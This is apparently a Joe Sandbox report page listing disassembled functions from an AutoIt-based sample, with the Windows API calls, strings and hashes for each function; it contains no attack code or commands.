API String ID: 44706859-0
Opcode ID: 7041cd43e6fc7bc4173e2813b46a5e125784a94a3bdb9d088378aca785c2d818
Instruction ID: d9050a9959a06e818e853ccdeaaadc67c303f869ea090071dfb099b77185183d
Opcode Fuzzy Hash: 7041cd43e6fc7bc4173e2813b46a5e125784a94a3bdb9d088378aca785c2d818
Instruction Fuzzy Hash: 46F06271200308AFEB511FA5EC88F773BACFF49754B04402DF945C6150CF699D41DA65

Function 007CC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 007CC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 007CC20E
MessageBeep.USER32(00000000), ref: 007CC226
KillTimer.USER32(?,0000040A), ref: 007CC242
EndDialog.USER32(?,00000001), ref: 007CC25C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 8e8f905d298a053dff2f84cb6cd00bb3e94916be1ab71a52325d813699ea6516
Instruction ID: b4b9496798d1c6330e5b10fd0fe1fb7fcc138714de0ce6818425805477b1dae1
Opcode Fuzzy Hash: 8e8f905d298a053dff2f84cb6cd00bb3e94916be1ab71a52325d813699ea6516
Instruction Fuzzy Hash: 6501A230404704ABEB215B60ED4EFA677B8FF00B06F00426DE546E14E0DFE86944CB94

Function 007713B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007713BF
StrokeAndFillPath.GDI32(?,?,007AB888,00000000,?), ref: 007713DB
SelectObject.GDI32(?,00000000), ref: 007713EE
DeleteObject.GDI32 ref: 00771401
StrokePath.GDI32(?), ref: 0077141C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 590cbb3c3399a125f2221899da746b31664a31878df0d322694450f2f0a342db
Instruction ID: 58fd07a1b62e7e252049d7bb85d5efc2226ff3a4a7fc54c61f96030b055bb91a
Opcode Fuzzy Hash: 590cbb3c3399a125f2221899da746b31664a31878df0d322694450f2f0a342db
Instruction Fuzzy Hash: D3F03730004B48EBDB115F2AEC4CB693FA5BB41366F58CA35E529880F1CB3C8995DF14

Function 007DC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007DC432
CoCreateInstance.OLE32(00802D6C,00000000,00000001,00802BDC,?), ref: 007DC44A

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

CoUninitialize.OLE32 ref: 007DC6B7

Strings

.lnk, xrefs: 007DC3C6, 007DC3EE, 007DC3F8

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: e39eb550528a292f754bd08644f1827ed6182c0fc36b0afe6a1241d3d88c203d
Instruction ID: 866997a8ccdd21231381b31a3346c00a756619fd80841ee81d6d172fc65d6f21
Opcode Fuzzy Hash: e39eb550528a292f754bd08644f1827ed6182c0fc36b0afe6a1241d3d88c203d
Instruction Fuzzy Hash: 95A13B71204205AFD700EF54C885EABB7E8FF85394F00896DF15997292DB75E909CB52

Function 00782CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00790DB6: std::exception::exception.LIBCMT ref: 00790DEC
Part of subcall function 00790DB6: __CxxThrowException@8.LIBCMT ref: 00790E01

Part of subcall function 00777DE1: _memmove.LIBCMT ref: 00777E22

Part of subcall function 00777A51: _memmove.LIBCMT ref: 00777AAB

__swprintf.LIBCMT ref: 00782ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00782D66

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: fb87990a44efd7a3b30f077e6c2e31dc6628ac8733c236d3a4dccf6e7e238add
Instruction ID: 4a9b0912465eed00c793e409a2309ceeb039fd35ff995bb0a798315dea8d7401
Opcode Fuzzy Hash: fb87990a44efd7a3b30f077e6c2e31dc6628ac8733c236d3a4dccf6e7e238add
Instruction Fuzzy Hash: 65917C71108201DFCB18FF28C889D6FB7B4EF85750F14891DF5499B2A2EA28ED45CB56

Function 007DB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00774750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00774743,?,?,007737AE,?), ref: 00774770

CoInitialize.OLE32(00000000), ref: 007DB9BB
CoCreateInstance.OLE32(00802D6C,00000000,00000001,00802BDC,?), ref: 007DB9D4
CoUninitialize.OLE32 ref: 007DB9F1

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

Strings

.lnk, xrefs: 007DB99D, 007DB9AB

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: b5dfb63200b8a374bdc5f4336580643bf4e2e0b8361920733d6ae24c349d8483
Instruction ID: 51cbacebca902f901d65df9dcc69b6317d9c80877f9bae612232effeda5ead3e
Opcode Fuzzy Hash: b5dfb63200b8a374bdc5f4336580643bf4e2e0b8361920733d6ae24c349d8483
Instruction Fuzzy Hash: 5AA12275604201DFCB00DF14C888D2ABBE5FF89324F158999F9999B3A1CB35EC45CB92

Function 0079501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 007950AD

Part of subcall function 007A00F0: __87except.LIBCMT ref: 007A012B

Strings

pow, xrefs: 00795085, 007950A2

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: f637d73740e43c34c19b1ca87818ff7eb775134a4a82fb7da30f2787d84fda78
Instruction ID: 8b9e8ff3270d7b0dc8c05b6be23838c66bb6b03e8336a29b96a09e9d6c47b6d0
Opcode Fuzzy Hash: f637d73740e43c34c19b1ca87818ff7eb775134a4a82fb7da30f2787d84fda78
Instruction Fuzzy Hash: BD516D21D08605C7DF127738D95537E2B94BB82700F208E59E4D5862E9EE3C8DC89BC6

Function 007B8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007B862B
_memmove.LIBCMT ref: 007B8685

Strings

_x, xrefs: 007B86FF, 007BDFDC, 007BDFF8
3cx, xrefs: 007B860C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _memmove
String ID: 3cx$_x
API String ID: 4104443479-2911194521
Opcode ID: a2b88d98cdad8c9c9f9e98f2566032a9b469875d73b1d21e14f8276b899ab8ad
Instruction ID: 12c6571c329b44c2400fa93bbb6f13f76cd31b9c9fe981ef53c93587b9d32baa
Opcode Fuzzy Hash: a2b88d98cdad8c9c9f9e98f2566032a9b469875d73b1d21e14f8276b899ab8ad
Instruction Fuzzy Hash: C2515DB0900609DFCF64DF68D884AEEB7F5FF44304F248529E85AD7250EB38A955CB51

Function 007C97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 007D14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9296,?,?,00000034,00000800,?,00000034), ref: 007D14E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007C983F

Part of subcall function 007D1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 007D14B1

Part of subcall function 007D13DE: GetWindowThreadProcessId.USER32(?,?), ref: 007D1409
Part of subcall function 007D13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007C925A,00000034,?,?,00001004,00000000,00000000), ref: 007D1419
Part of subcall function 007D13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007C925A,00000034,?,?,00001004,00000000,00000000), ref: 007D142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007C98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007C98F9

Strings

@, xrefs: 007C9911

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 053e506d823af4d7d6eab790fb529da7e6548a360b4dd30f190dab24bcd716ab
Instruction ID: 5a472be4cfd8d0b731e4b4284d7acfb0ada029a422d1a9bf0798cc3a93c43319
Opcode Fuzzy Hash: 053e506d823af4d7d6eab790fb529da7e6548a360b4dd30f190dab24bcd716ab
Instruction Fuzzy Hash: 20414B76900218BECB10DFA4CD89EDEBBB8EF49700F004099FA45B7291DA746E45CBA0

Function 007F7946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007FF910,00000000,?,?,?,?), ref: 007F79DF
GetWindowLongW.USER32 ref: 007F79FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F7A0C

Strings

SysTreeView32, xrefs: 007F79B1

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: a7de89343e912b2f9aa64a6b66472359b2e95ad2e346177b3ff4349eb602545e
Instruction ID: 6f620b4911e90877af6c0deae6ab7ed7d8600407cf0ee87127e51390cb1974f7
Opcode Fuzzy Hash: a7de89343e912b2f9aa64a6b66472359b2e95ad2e346177b3ff4349eb602545e
Instruction Fuzzy Hash: 3731BD3120460AABDB158E38CC45BEA77A9EF04324F208725FA75922E0D778E951CB50

Function 007F73D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007F7461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007F7475
SendMessageW.USER32(?,00001002,00000000,?), ref: 007F7499

Strings

SysMonthCal32, xrefs: 007F742C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: a5e7aa3e87cefd2e584aa10af7c6663f7c2d3a8a04a0205a7abb788000669a13
Instruction ID: f8316f7d7f1b5f57545d20356b9ec5e865ae43ccf311eec3fc40a95dc81f2327
Opcode Fuzzy Hash: a5e7aa3e87cefd2e584aa10af7c6663f7c2d3a8a04a0205a7abb788000669a13
Instruction Fuzzy Hash: 63219132500258ABDF158E94CC46FFA3B79FF48724F110114FE556B290DA79AC51DBA0

Function 007F7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007F7C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007F7C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007F7C5F

Strings

msctls_updown32, xrefs: 007F7BC4

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: f5bd31162e3091b3dcd750051c9ea791a2de6819f1e52fe604fdd2400023b083
Instruction ID: da072022d9b63264bd4849aabba8b96943c00a89fe05e5b291b4f1514f85a73d
Opcode Fuzzy Hash: f5bd31162e3091b3dcd750051c9ea791a2de6819f1e52fe604fdd2400023b083
Instruction Fuzzy Hash: 772169B1204208AFEB14DF28DCC5CB737ACEF4A3A4B544459FA159B3A1CB35EC11CAA0

Function 007F6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007F6D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007F6D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007F6D70

Strings

Listbox, xrefs: 007F6D08

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 59425645b92e90bd51d2932d6396d8c8a14a1c1673a6ceabeb6b86cf5ef4cbf2
Instruction ID: 7df5b911f306f742f3414400c45632cff29caa448e9a488c6c8ad6e508bbaa8b
Opcode Fuzzy Hash: 59425645b92e90bd51d2932d6396d8c8a14a1c1673a6ceabeb6b86cf5ef4cbf2
Instruction Fuzzy Hash: 24217F3261011CABDF118F54DC45EBB3BBAEF89750F018124FA559B2A0CA79AC51DBA0

Function 007F770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007F7772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007F7787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007F7794

Strings

msctls_trackbar32, xrefs: 007F7749

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 1608d918128f0269d1f5aa6746bcab16c638872eae07bffa04298f3e52859a00
Instruction ID: c6d7e7462c6f02ae91ede665410f2a16fd3b4a2646c6e59019e810b438c49a40
Opcode Fuzzy Hash: 1608d918128f0269d1f5aa6746bcab16c638872eae07bffa04298f3e52859a00
Instruction Fuzzy Hash: F0112732210208BAEF246F65CC05FE73769EF88B64F014118F741921A0C675E811CB20

Function 00774C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00774B83,?), ref: 00774C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00774C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00774C50
kernel32.dll, xrefs: 00774C3F

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 90e10e8a7850dd35f9eb33cefaf0851df14177691c83da8632cf854628e132b2
Instruction ID: 874a939129ee28d6242a02e0a9c50d3a7c059fc77a57c6793351e19a36b7a4a9
Opcode Fuzzy Hash: 90e10e8a7850dd35f9eb33cefaf0851df14177691c83da8632cf854628e132b2
Instruction Fuzzy Hash: 79D01270611717CFDB205F31D948626B7E9AF05391B21C839D595D6260EB78D480C660

Function 00774C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00774BD0,?,00774DEF,?,008352F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00774C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00774C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00774C1D
kernel32.dll, xrefs: 00774C0C

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: a01b2decb317188311e5d39e2080fb161a9afb69cd5e05e80650820e896f32e4
Instruction ID: 295bd7083303cc8657fe26b0aa128d178d07a921d8652f5fa3b79e39538d963d
Opcode Fuzzy Hash: a01b2decb317188311e5d39e2080fb161a9afb69cd5e05e80650820e896f32e4
Instruction Fuzzy Hash: 57D01270511717CFDB205F71D948616B6E6EF09391B11CC3AD495D6250EBB8D480C660

Function 007F0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,007F1039), ref: 007F0DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007F0E07

Strings

RegDeleteKeyExW, xrefs: 007F0E01
advapi32.dll, xrefs: 007F0DF0

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 9120ff044c0a52f8a06d083ea0eb9d31a875ebdb5c3e681ea865672bd91756fa
Instruction ID: 88dc3dcfae76e5e195c059f5a72b926ac06fd09ef97ed57d8c24ef2456cb851c
Opcode Fuzzy Hash: 9120ff044c0a52f8a06d083ea0eb9d31a875ebdb5c3e681ea865672bd91756fa
Instruction Fuzzy Hash: 4ED0827060032ACFC320AF70D8082A272E5AF00362F00CC2ED592C2350EABCD890CA84

Function 007E90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,007E8CF4,?,007FF910), ref: 007E90EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007E9100

Strings

kernel32.dll, xrefs: 007E90E9
GetModuleHandleExW, xrefs: 007E90FA

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

